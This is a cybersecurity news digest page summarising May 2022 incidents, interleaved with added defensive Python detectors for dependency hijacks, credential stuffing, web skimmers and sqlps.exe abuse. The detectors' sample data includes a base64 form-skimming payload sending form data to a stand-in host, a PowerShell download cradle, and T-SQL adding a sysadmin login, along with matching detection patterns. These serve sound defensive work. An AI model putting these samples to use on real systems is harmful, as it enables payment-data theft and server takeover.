Current Cyber Threats...

Industrial Spy Data Extortion Market Gets into the Ransomware
Date: 2022-05-25

The Industrial Spy data extortion marketplace has now launched its own ransomware operation, in which the operators also encrypt victims' devices. The marketplace allows threat actors, and even business competitors, to purchase stolen data from various companies. It sells different tiers of stolen data, ranging from 'premium' data sets for millions of dollars to individual files for as little as $2.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Hacker of Python, PHP Libraries: No “Malicious Activity” Was Intended
Date: 2022-05-25

The two packages in question were 'ctx' (Python) and 'PHPass' (PHP), which together have been downloaded over 3 million times. The incident sparked panic and discussion among developers, now worried about the impact of the hijack on the overall software supply chain. Developers noticed yesterday that the two libraries had been modified to harvest AWS developer credentials, in what the hijacker claimed was a bug-bounty exercise meant to be ethical in nature. However, “The hijacked versions didn't stop at basic PoC—they stole the developer's environment variables and AWS credentials,” casting doubt on the hijacker's intentions and on whether this was ethical research at all.
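
The practical defence against a hijacked release like this is to pin dependencies by content hash, not only by version, so that a re-uploaded or replaced artifact fails to install. The following is an added example, not code from the page or from the ctx or PHPass projects: it parses a hash-pinned requirements file in pip's `--hash=sha256:` layout and verifies fetched artifacts against it. The package names, digests and artifact bytes are constructed for the demo; in practice you would feed it the files pip downloads, or simply run `pip install --require-hashes -r requirements.txt`.

```python
"""Verify a hash-pinned requirements file against locally fetched artifacts.

Added example, not code from the page or from the ctx / PHPass projects.
A hijacked re-upload of an already pinned version carries a different
digest, so it is rejected here before anything gets installed. Package
names, digests and artifact bytes are constructed for the demo.
"""
import hashlib
import re

# One pinned line after joining pip's backslash continuations:
#   name==version --hash=sha256:<64 hex> [--hash=sha256:<64 hex> ...]
_REQ_RE = re.compile(
    r"^([A-Za-z0-9_.\-]+)==(\S+)((?:\s+--hash=sha256:[0-9a-f]{64})+)\s*$")
_DIGEST_RE = re.compile(r"sha256:([0-9a-f]{64})")


def parse_requirements(text):
    """Return {name: (version, {allowed sha256 hex digests})}.

    Any requirement without at least one --hash is an error: a single
    unpinned line would be the hole an attacker needs.
    """
    pinned = {}
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = _REQ_RE.match(line)
        if not m:
            raise ValueError(f"requirement is not hash-pinned: {line!r}")
        pinned[m.group(1).lower()] = (m.group(2), set(_DIGEST_RE.findall(m.group(3))))
    return pinned


def verify_artifacts(requirements_text, artifacts):
    """artifacts: {name: (version, bytes)} as fetched from the index.

    Returns (ok, problems). A missing artifact, a version other than the
    pinned one, or a digest outside the pin set is a problem.
    """
    problems = []
    for name, (want_version, digests) in parse_requirements(requirements_text).items():
        if name not in artifacts:
            problems.append(f"{name}: no artifact fetched")
            continue
        got_version, data = artifacts[name]
        if got_version != want_version:
            problems.append(f"{name}: version {got_version} != pinned {want_version}")
            continue
        digest = hashlib.sha256(data).hexdigest()
        if digest not in digests:
            problems.append(f"{name}=={got_version}: sha256 {digest[:12]}... not in pin set")
    return (not problems, problems)


# Constructed demo data. "goodpkg" matches its pin. "ctxlike" keeps the
# pinned version string but ships different bytes, which is exactly what a
# hijacked re-upload of a pinned version looks like to this check.
GOOD_WHEEL = b"PK\x03\x04 goodpkg-1.0.0 demo wheel bytes"
ORIGINAL_CTXLIKE = b"PK\x03\x04 ctxlike-0.2.2 original bytes"
TAMPERED_CTXLIKE = b"PK\x03\x04 ctxlike-0.2.2 bytes that read os.environ"

DEMO_REQUIREMENTS = (
    "goodpkg==1.0.0 \\\n"
    f"    --hash=sha256:{hashlib.sha256(GOOD_WHEEL).hexdigest()}\n"
    "ctxlike==0.2.2 \\\n"
    f"    --hash=sha256:{hashlib.sha256(ORIGINAL_CTXLIKE).hexdigest()}\n"
)


def demo(tampered=True):
    """Run the check against the constructed data; tampered=False is the clean case."""
    artifacts = {
        "goodpkg": ("1.0.0", GOOD_WHEEL),
        "ctxlike": ("0.2.2", TAMPERED_CTXLIKE if tampered else ORIGINAL_CTXLIKE),
    }
    return verify_artifacts(DEMO_REQUIREMENTS, artifacts)


if __name__ == "__main__":
    ok, problems = demo()
    print("OK" if ok else "REJECT", problems)
```

Note that the check rejects the tampered artifact even though its name and version are exactly what the lock file asks for; a version pin alone would have let it through. Hash pinning does not help against a brand-new malicious version that nobody has pinned yet, which is why the same lock file also refuses any line that carries no hash.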

Researchers Find New Malware Attacks Targeting Russian Government Entities
Date: 2022-05-25

An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda.

BPFDoor Malware Uses Solaris Vulnerability to Get Root Privileges
Date: 2022-05-25

New research into the inner workings of the stealthy BPFDoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems. BPFDoor is a custom backdoor that has been used largely undetected for at least five years in attacks against telecommunications, government, education, and logistics organizations. The malware was discovered only recently and reported first by researchers from PricewaterhouseCoopers (PwC), who attributed it to a China-based threat actor they track as Red Menshen. PwC found BPFDoor during an incident response engagement in 2021. Looking closer at the malware, the researchers noticed that it received commands from Virtual Private Servers (VPS) controlled through compromised routers in Taiwan.

New Zoom Flaws Could Let Attac
Date: 2022-05-25

Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.

Interpol Arrests Alleged Leader of the SilverTerrier BEC Gang
Date: 2022-05-25

After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT. Codenamed Delilah, the law enforcement operation engaged police agencies across four continents and is the third one focused on identifying and arresting suspected members of the SilverTerrier gang.

General Motors Credential Stuffing Attack Exposes Car Owners’ Info
Date: 2022-05-24

US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed some customers' information and allowed hackers to redeem rewards points for gift cards. General Motors operates an online platform that lets owners of Chevrolet, Buick, GMC, and Cadillac vehicles manage their bills and services and redeem rewards points. Car owners can redeem GM rewards points towards GM vehicles, car service, accessories, and OnStar service plans.
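
Credential stuffing has a recognizable shape in authentication logs that a per-account lockout policy misses: one source cycles through many distinct usernames, trying each once or twice, with a high failure rate, and the handful of successes are the accounts whose passwords were reused from some other breach. The following added example (not GM's code or anything from the disclosure) runs that heuristic over constructed log lines; the log format, the window and the thresholds are assumptions to be tuned per site.

```python
"""Flag credential-stuffing sources in authentication logs.

Added example, not GM's code or anything from the disclosure. Stuffing looks
different from a brute force against one account: one source tries many
distinct usernames, each once or twice, mostly failing, and the few
successes are the accounts to force a reset on. Log format, thresholds and
sample lines are constructed for the demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<ISO-8601 UTC> <source ip> <username> <OK|FAIL>"
SAMPLE_LOG = """\
2022-04-11T02:00:01Z 203.0.113.7 alice@example.com FAIL
2022-04-11T02:00:02Z 203.0.113.7 bob@example.com FAIL
2022-04-11T02:00:02Z 203.0.113.7 carol@example.com OK
2022-04-11T02:00:03Z 203.0.113.7 dave@example.com FAIL
2022-04-11T02:00:04Z 203.0.113.7 erin@example.com FAIL
2022-04-11T02:00:05Z 203.0.113.7 frank@example.com FAIL
2022-04-11T02:00:06Z 203.0.113.7 grace@example.com OK
2022-04-11T02:00:07Z 203.0.113.7 heidi@example.com FAIL
2022-04-11T02:01:00Z 198.51.100.9 alice@example.com FAIL
2022-04-11T02:01:30Z 198.51.100.9 alice@example.com FAIL
2022-04-11T02:02:00Z 198.51.100.9 alice@example.com OK
2022-04-11T03:30:00Z 192.0.2.44 ivan@example.com OK
"""


def parse_log(text):
    """Return [(timestamp, ip, user, success)] for the constructed format."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result == "OK"))
    return events


def detect_stuffing(events, window=timedelta(minutes=10), min_users=5, min_fail_ratio=0.5):
    """Return {ip: finding} for sources that look like credential stuffing.

    A source is flagged when some `window` of its attempts covers at least
    `min_users` distinct usernames and at least `min_fail_ratio` of those
    attempts failed. The finding keeps the widest such window plus the
    usernames that succeeded inside it. Thresholds are assumptions.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window forward
                start += 1
            chunk = evs[start:end + 1]
            users = {e[2] for e in chunk}
            failures = sum(1 for e in chunk if not e[3])
            if len(users) < min_users or failures / len(chunk) < min_fail_ratio:
                continue
            prev = findings.get(ip)
            if prev is None or len(users) > prev["distinct_users"]:
                findings[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(chunk),
                    "failures": failures,
                    "compromised": sorted({e[2] for e in chunk if e[3]}),
                }
    return findings


def run_demo():
    """Apply the detector to the constructed sample log."""
    return detect_stuffing(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for ip, f in run_demo().items():
        print(f"{ip}: {f['distinct_users']} users / {f['attempts']} attempts, "
              f"{f['failures']} failed; reset: {', '.join(f['compromised'])}")
```

In the sample, 198.51.100.9 fails twice against one account and then succeeds, which is what a user mistyping a password looks like and is not flagged; 203.0.113.7 walks eight accounts in six seconds and is. The two accounts that succeeded from that source are the ones to reset and, in the GM case, the ones whose reward points would have been drained.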

New Chaos Ransomware Builder Variant "Yashma" Discovered in the Wild
Date: 2022-05-24

The Research and Intelligence team at BlackBerry released a report today detailing a new version of the Chaos ransomware line, dubbed Yashma. Chaos is a customizable ransomware builder that emerged in underground forums on June 9, 2021, by falsely marketing itself as the .NET version of Ryuk despite sharing no such overlaps with the notorious counterpart. Since its discovery, the ransomware builder has undergone five successive iterations aimed at improving its functionalities: version 2.0 on June 17, version 3.0 on July 5, version 4.0 on August 5, and version 5.0 in early 2022.

Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code
Date: 2022-05-24

Microsoft recently observed web skimming campaigns employing various obfuscation techniques to deliver and hide skimming scripts. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team said in a new report.
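
Two of the tells Microsoft describes can be checked mechanically: a script tag whose file name borrows Google Analytics or Meta Pixel vocabulary but loads from a host that is not the real provider, and an inline script that keeps its logic in a base64 string handed to atob(). The following added example, not Microsoft's code, applies both checks to page HTML. The host allowlist, the name patterns, the skimmer indicator strings and the sample page are constructed assumptions.

```python
"""Spot scripts that impersonate Google Analytics / Meta Pixel in page HTML.

Added example, not Microsoft's code. Two checks matching the tactics in the
report: (1) an external script whose file name borrows analytics vocabulary
but loads from a host that is not the genuine provider, and (2) an inline
script that hides its logic in a long base64 literal handed to atob(). The
host allowlist, name patterns, indicator strings and sample page are
constructed assumptions for the demo.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: hosts the genuine Google / Meta tags load from.
LEGIT_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com", "connect.facebook.net"}
# Assumed vocabulary a skimmer borrows for cover.
LOOKALIKE_RE = re.compile(r"google-?analytics|gtag|analytics\.js|fbevents|pixel", re.I)
# Assumed strings worth flagging inside a decoded payload.
SKIM_INDICATORS = ("document.forms", "cvv", "cardnumber", "onsubmit", "keyup",
                   "XMLHttpRequest", "fetch(")
# A quoted base64 literal of at least 120 characters.
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{120,}={0,2})['\"]")


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_html(html):
    """Return [(kind, detail)] findings for one page's HTML."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        host = urlparse(src).netloc.lower()
        # Relative URLs (empty host) are same-origin and out of scope here.
        if host and host not in LEGIT_HOSTS and LOOKALIKE_RE.search(src):
            findings.append(("lookalike-host", src))
    for body in p.inline:
        if "atob(" not in body:
            continue
        for blob in B64_LITERAL_RE.findall(body):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except ValueError:
                continue
            hits = [s for s in SKIM_INDICATORS if s.lower() in decoded.lower()]
            if hits:
                findings.append(("base64-skimmer", ", ".join(hits)))
    return findings


# Constructed sample page: one genuine gtag include, one lookalike loaded from
# a third-party CDN, and one inline script that evals a base64 form hook.
_PAYLOAD_JS = ("document.forms[0].onsubmit=function(){var d=new FormData(this);"
               "fetch('https://stats-collector.example/log',{method:'POST',body:d});};")
SAMPLE_HTML = f"""<html><head>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-0000"></script>
<script src="https://cdn-metrics.example/google-analytics.js"></script>
<script>
  var _0x = "{base64.b64encode(_PAYLOAD_JS.encode()).decode()}";
  eval(atob(_0x));
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(kind, "->", detail)
```

The genuine gtag include passes because its host is on the allowlist even though the name matches; the copy served from `cdn-metrics.example` is flagged on host alone. Real skimmers layer more obfuscation than one atob() call, so treat the decoded-payload check as a first pass and compare flagged scripts against the site's known-good script inventory.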

Researchers to Release Exploit for New VMware Auth Bypass, Patch Now
Date: 2022-05-24

Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately. In an advisory on May 18th, VMware warned that the security implications for leaving CVE-2022-22972 unpatched are severe as the issue is "in the critical severity range with a maximum CVSSv3 base score of 9.8," with 10 being the maximum.

Nation-state Malware Could Become a Commodity on Dark Web Soon, Interpol Warns
Date: 2022-05-24

“Interpol Secretary General Jurgen Stock declared that nation-state malware will become available on the darknet in a couple of years. In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non-state actors represents a serious risk for critical infrastructure and organizations worldwide” (Security Affairs, 2022).

Chinese "Twisted Panda" Hackers Caught Spying on Russian Defense Institutes
Date: 2022-05-23

At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed "Twisted Panda," come in the backdrop of Russia's military invasion of Ukraine, prompting a wide range of threat actors to swiftly adapt their campaigns on the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents.

Russian Hackers Perform Reconnaissance Against Austria, Estonia
Date: 2022-05-23

In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College. This discovery comes from cybersecurity firm Sekoia, which built upon previous findings of Google’s TAG, which has been following Russian hackers closely this year. Google warned about coordinated Russian-based threat group activity in late March 2022, while in May, they spotted two Turla domains used in ongoing campaigns. Sekoia used this information to investigate further and found that Turla targeted the federal organization in Austria and the military college in the Baltic region.

Google: Predator Spyware Infected Android Devices Using Zero-Days
Date: 2022-05-23

Google's Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox. In these attacks, part of three campaigns that started between August and October 2021, the attackers used zero-day exploits targeting Chrome and the Android OS to install Predator spyware implants on fully up-to-date Android devices.

Threat Actors Target the InfoSec Community with Fake PoC Exploits
Date: 2022-05-23

Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the InfoSec community. The researchers found a GitHub repository in which a purported researcher was sharing a fake proof-of-concept (PoC) exploit for the RPC Runtime Library remote code execution flaw CVE-2022-26809 (CVSS 9.8). The malware, disguised as the PoC code, was available on GitHub.

Cisco Urges Admins to Patch IOS XR Zero-day Exploited in Attacks
Date: 2022-05-23

Cisco has addressed a zero-day vulnerability in its IOS XR router software that allowed unauthenticated attackers to remotely access Redis instances running in NOSi Docker containers. The IOS XR Network OS is deployed on multiple Cisco router platforms, including NCS 540 & 560, NCS 5500, 8000, and ASR 9000 series routers.

Researchers Uncover Rust Supply-Chain Attack Targeting Cloud CI Pipelines
Date: 2022-05-20

A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware. Cybersecurity firm SentinelOne dubbed the attack "CrateDepression."

Conti Ransomware Shuts Down Operation, Rebrands Into Smaller Units
Date: 2022-05-20

Advanced Intel researcher Yelisey Boguslavskiy announced on Twitter yesterday that the Conti ransomware gang has officially shut down its operation, stating that the gang's internal infrastructure was turned off. While the public-facing 'Conti News' data leak and ransom negotiation sites are still online, Boguslavskiy told BleepingComputer that the Tor admin panels used by members to perform negotiations and publish "news" on their data leak site are now offline.

Microsoft Detects Massive Surge in Linux XorDdos Malware Activity
Date: 2022-05-20

Microsoft stated in a blog post yesterday that it has seen a 254% increase in activity from a Linux trojan called XorDdos. XorDdos is a modular malware that amasses botnets by targeting a multitude of Linux system architectures (ARM, x86, and x64). First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its usage of XOR-based encryption for C2 communication and being employed to launch distributed denial-of-service (DDoS) attacks. As the tech giant revealed, the botnet’s success is likely due to its extensive use of various evasion and persistence tactics which allow it to remain stealthy and hard to remove.

Modern "Smart" Farm Machinery Vulnerable to Cyber-Attackers
Date: 2022-05-20

A new risk analysis published today warns that modern “smart” farm machinery is vulnerable to malicious hackers, leaving global supply chains exposed to risk. The analysis, published in the journal Nature Machine Intelligence, warns that hackers could exploit flaws in agricultural hardware used to plant and harvest crops. Additionally, it said automatic crop sprayers, drones and robotic harvesters could be vulnerable to hackers.

Canada Bans Huawei and ZTE from 5G Networks Over Security Concerns
Date: 2022-05-19

The Government of Canada announced its intention to ban the use of Huawei and ZTE telecommunications equipment and services across the country's 5G and 4G networks. The statement explains that after a thorough review from Canada's independent security agencies, the two Chinese tech companies have been deemed too great of a security risk to be allowed in the country's telecommunication network.

Jupiter WordPress Plugin Flaws Let Hackers Take Over Sites
Date: 2022-05-19

WordPress security analysts have discovered a set of vulnerabilities impacting the Jupiter Theme and JupiterX Core plugins for WordPress, one of which is a critical privilege escalation flaw. Jupiter is a theme builder for WordPress sites used by over 90,000 blogs, online magazines, and other high-traffic platforms. The vulnerability, tracked as CVE-2022-1654 and given a CVSS score of 9.9 (critical), allows any authenticated user on a site using the vulnerable plugins to gain administrative privileges.

QNAP Alerts NAS Customers of New Deadbolt Ransomware Attacks
Date: 2022-05-19

Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads. The company asked users to update their NAS devices to the latest software version and ensure that they're not exposed to remote access over the Internet.

Web Trackers Caught Intercepting Online Forms Even Before Users Hit Submit
Date: 2022-05-19

New research published by academics from KU Leuven, Radboud University, and the University of Lausanne has revealed that users' email addresses are exfiltrated to tracking, marketing, and analytics domains before the form is submitted and without prior consent. The study involved crawling 2.8 million pages from the top 100,000 websites, and found that as many as 1,844 websites allowed trackers to capture email addresses before form submission when visited from the European Union, a number that jumped to 2,950 when the same set of websites was visited from the U.S.

China-linked Space Pirates APT Targets the Russian Aerospace Industry
Date: 2022-05-19

A previously unknown Chinese cyberespionage group, tracked as ‘Space Pirates’, is targeting enterprises in the Russian aerospace industry with spear-phishing attacks. The group has been active since at least 2017, and researchers believe it is linked with other China-linked APT groups, including APT41 (Winnti), Mustang Panda, and APT27.

Ransomware Gangs Rely More on Weaponizing Vulnerabilities
Date: 2022-05-19

Group-IB released a report this week outlining the various tactics ransomware groups use to breach victim networks. According to the research, external remote access services remain the main initial access vector for ransomware gangs; however, the researchers note an uptick in the exploitation of vulnerabilities.

VMware Patches Critical Auth Bypass Flaw in Multiple Products
Date: 2022-05-18

VMware warned customers today to immediately patch a critical authentication bypass vulnerability "affecting local domain users" in multiple products that can be exploited to obtain admin privileges. The flaw (tracked as CVE-2022-22972) was reported by Bruno López of Innotec Security, who found that it impacts Workspace ONE Access, VMware Identity Manager (vIDM), and vRealize Automation.

Microsoft Warns of "Cryware" Info-Stealing Malware Targeting Crypto Wallets
Date: 2022-05-18

Microsoft is warning of an emerging threat targeting internet-connected cryptocurrency wallets, signaling a departure in the use of digital coins in cyberattacks. The tech giant dubbed the new threat "cryware," with the attacks resulting in the irreversible theft of virtual currencies by means of fraudulent transfers to an adversary-controlled wallet.

[WS] Wizard Spider Group In-Depth Analysis
Date: 2022-05-18

On May 16, 2022, the threat intelligence team at PRODAFT (PTI) released a report detailing the inner workings of the Wizard Spider group. Wizard Spider is a financially motivated cybercrime group that is believed to operate out of Russia. The group was first identified in 2017 and is known for the creation and deployment of TrickBot, a modular malware that was officially discontinued earlier this year. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals. The group has been tied to various malware families and tools, including Ryuk, Conti, Bazar, and Cobalt Strike.

Researchers Spotted a New Variant of the UpdateAgent macOS Malware Dropper
Date: 2022-05-18

Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version is written in Swift and relies on the AWS infrastructure to host its malicious payloads. The malware dropper has a variety of capabilities including system fingerprinting, endpoint registration, and persistence tools. For second stage payloads, researchers found evidence of different types of malware, spyware and adware.

Microsoft Warns of Brute-force Attacks Targeting MSSQL Servers
Date: 2022-05-18

Microsoft warned of brute-force attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers that use weak passwords. While this isn't the first time MSSQL servers have been targeted in such attacks, Microsoft says that the threat actors behind this recently observed campaign are using the legitimate sqlps.exe tool as a LOLBin (living-off-the-land binary).

The threat actors use the sqlps[.]exe utility to achieve fileless persistence. The executable is a PowerShell wrapper that loads the SQL Server cmdlets; the attackers use it to create a new sysadmin account, which gives them full control of the SQL server. From there they can perform other actions and deploy additional payloads such as ransomware or cryptominers.
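
Because sqlps.exe is a legitimate PowerShell host that ships with SQL Server (SQL Server Agent uses it to run PowerShell job steps), blocking the binary is not an option; the detection has to look at how it is launched. The following added example, not Microsoft's detection logic, scores process-creation events for sqlps.exe using the parent process, an encoded command, a download cradle, and T-SQL that creates a login or adds a member to the sysadmin role. The event field names, file paths, sample events, weights and threshold are constructed assumptions to tune against your own baseline.

```python
"""Score sqlps.exe launches for the MSSQL LOLBin abuse described above.

Added example, not Microsoft's detection logic. sqlps.exe is a legitimate
PowerShell host shipped with SQL Server (SQL Server Agent uses it for
PowerShell job steps), so the signal is how it is launched, not that it
ran: a parent that points at xp_cmdshell rather than the Agent, an encoded
command, a download cradle, or T-SQL that creates a login and adds it to
the sysadmin role. Field names, paths, sample events, weights and the
threshold are constructed assumptions to tune against your own baseline.
"""
import re

# Assumed benign launcher: SQL Server Agent running a PowerShell job step.
EXPECTED_PARENTS = {"sqlagent.exe"}
# Parents that suggest xp_cmdshell or a hands-on-keyboard operator instead.
SUSPICIOUS_PARENTS = {"sqlservr.exe", "cmd.exe", "powershell.exe"}

INDICATORS = {
    "sysadmin-role-change": re.compile(
        r"sp_addsrvrolemember|alter\s+server\s+role\s+sysadmin\s+add\s+member", re.I),
    "new-login": re.compile(r"\bcreate\s+login\b", re.I),
    "encoded-command": re.compile(
        r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download-cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
}
# Assumed weights: a role change alone is enough to page; other signals need company.
WEIGHTS = {"sysadmin-role-change": 3}


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Return (score, reasons) for one process-creation event dict.

    Keys read: image, parent_image, command_line. Non-sqlps.exe events score 0.
    """
    if _basename(ev.get("image", "")) != "sqlps.exe":
        return 0, []
    parent = _basename(ev.get("parent_image", ""))
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"parent {parent}")
    elif parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent {parent or '?'}")
    cmd = ev.get("command_line", "")
    reasons.extend(name for name, rx in INDICATORS.items() if rx.search(cmd))
    score = sum(WEIGHTS.get(r, 1) for r in reasons)
    return score, reasons


def triage(events, threshold=2):
    """Return [(host, score, reasons)] for events scoring at or above threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev.get("host", "?"), score, reasons))
    return alerts


# Constructed sample events (Sysmon event 1 style, trimmed to the fields used).
SAMPLE_EVENTS = [
    {   # benign: Agent job step running a maintenance procedure
        "host": "sql01", "image": r"C:\SQLTools\sqlps.exe",
        "parent_image": r"C:\SQLTools\SQLAGENT.EXE",
        "command_line": "sqlps.exe -NoLogo -Command \"Invoke-Sqlcmd -Query 'EXEC dbo.nightly_reindex'\"",
    },
    {   # the campaign's pattern: spawned via cmd.exe, creates a login, adds it to sysadmin
        "host": "sql02", "image": r"C:\SQLTools\sqlps.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": ("sqlps.exe -Command \"Invoke-Sqlcmd -Query 'CREATE LOGIN svc_bak2 "
                         "WITH PASSWORD=''x''; ALTER SERVER ROLE sysadmin ADD MEMBER svc_bak2'\""),
    },
    {   # spawned directly under the SQL Server process with an encoded command
        "host": "sql03", "image": r"C:\SQLTools\sqlps.exe",
        "parent_image": r"C:\SQLTools\sqlservr.exe",
        "command_line": "sqlps.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
    {   # single weak signal from the expected parent: stays below the threshold
        "host": "sql04", "image": r"C:\SQLTools\sqlps.exe",
        "parent_image": r"C:\SQLTools\SQLAGENT.EXE",
        "command_line": "sqlps.exe -Command \"(New-Object Net.WebClient).DownloadString('http://198.51.100.5/x')\"",
    },
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}: score {score}: {'; '.join(reasons)}")
```

The sql04 event shows the trade-off in the weighting: a download cradle from an Agent job step is a single signal and does not reach the threshold on its own, so on an estate where Agent jobs never fetch from the Internet you would raise its weight. Whatever the scoring, pair it with a periodic query of `sys.server_role_members` so that a sysadmin login created through a path you did not log still gets noticed.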

A Custom PowerShell RAT Used to Target German Users, Using the Ukraine Crisis as Bait
Date: 2022-05-17

Researchers at Malwarebytes uncovered a campaign that targets German users with a custom PowerShell RAT. The threat actors attempt to trick victims into opening weaponized documents by using the current situation in Ukraine as bait. The attackers registered an expired German domain, collaboration-bw[.]de, as a decoy site. The site hosted a bait document named “2022-Q2-Bedrohungslage-Ukraine” that was used to deliver the custom malware; the document appears to contain information about the current crisis in Ukraine.

Hackers Target Tatsu WordPress Plugin in Millions of Attacks
Date: 2022-05-17

Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites. Tatsu Builder is a popular plugin that offers powerful template editing features integrated right into the web browser. Large attack waves started on May 10, 2022 and peaked four days later. Exploitation is currently ongoing.

US Warning: North Korea's Tech Workers Posing as Freelance Developers
Date: 2022-05-17

Skilled software and mobile app developers from North Korea are posing as US-based remote workers to land contract work as developers in US and European tech and crypto firms. The warning comes in a new joint advisory from The US Department of State, the US Department of the Treasury, and the Federal Bureau of Investigation (FBI) outlining the role North Korean IT workers play in raising revenue for North Korea, which contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of U.S. and UN sanctions.

CISA Warns Admins to Patch Actively Exploited Spring Cloud Gateway, Zyxel Bugs
Date: 2022-05-17

CISA has added two more vulnerabilities to its list of actively exploited bugs: a code injection bug in the Spring Cloud Gateway library and a command injection flaw in Zyxel firmware for business firewalls and VPN devices. The Spring Cloud Gateway vulnerability (CVE-2022-22947) is a maximum severity flaw that attackers can abuse to gain remote code execution on unpatched hosts. The vulnerability is being exploited by a recently discovered botnet called Sysrv, which installs cryptomining malware on vulnerable Windows and Linux servers.

Ukraine CERT-UA Warns of New Attacks Launched by Russia-linked Armageddon APT
Date: 2022-05-16

Ukraine's CERT-UA has released details of a new phishing attack carried out by the Russia-linked Armageddon group. The threat actors use an HTM file that decodes and creates an archive named “Henson[.]rar”, which contains a malicious LNK file titled “Kherson[.]lnk”. When the link file is clicked, the HTA file “precarious[.]xml” is loaded and executed, leading to the creation and execution of the files “desktop[.]txt” and “user[.]txt”. In the last stage of the attack chain, the GammaLoad[.]PS1_v2 malware is downloaded and executed on the victim's computer.

Hackers are Exploiting Critical Bug in Zyxel Firewalls and VPNs
Date: 2022-05-16

Hackers have started to exploit a recently patched critical vulnerability tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses. Successful exploitation allows a remote attacker to inject arbitrary commands remotely without authentication, which can enable setting up a reverse shell.

SonicWall ‘Strongly Urges’ Admins to Patch SSLVPN SMA1000 Bugs
Date: 2022-05-16

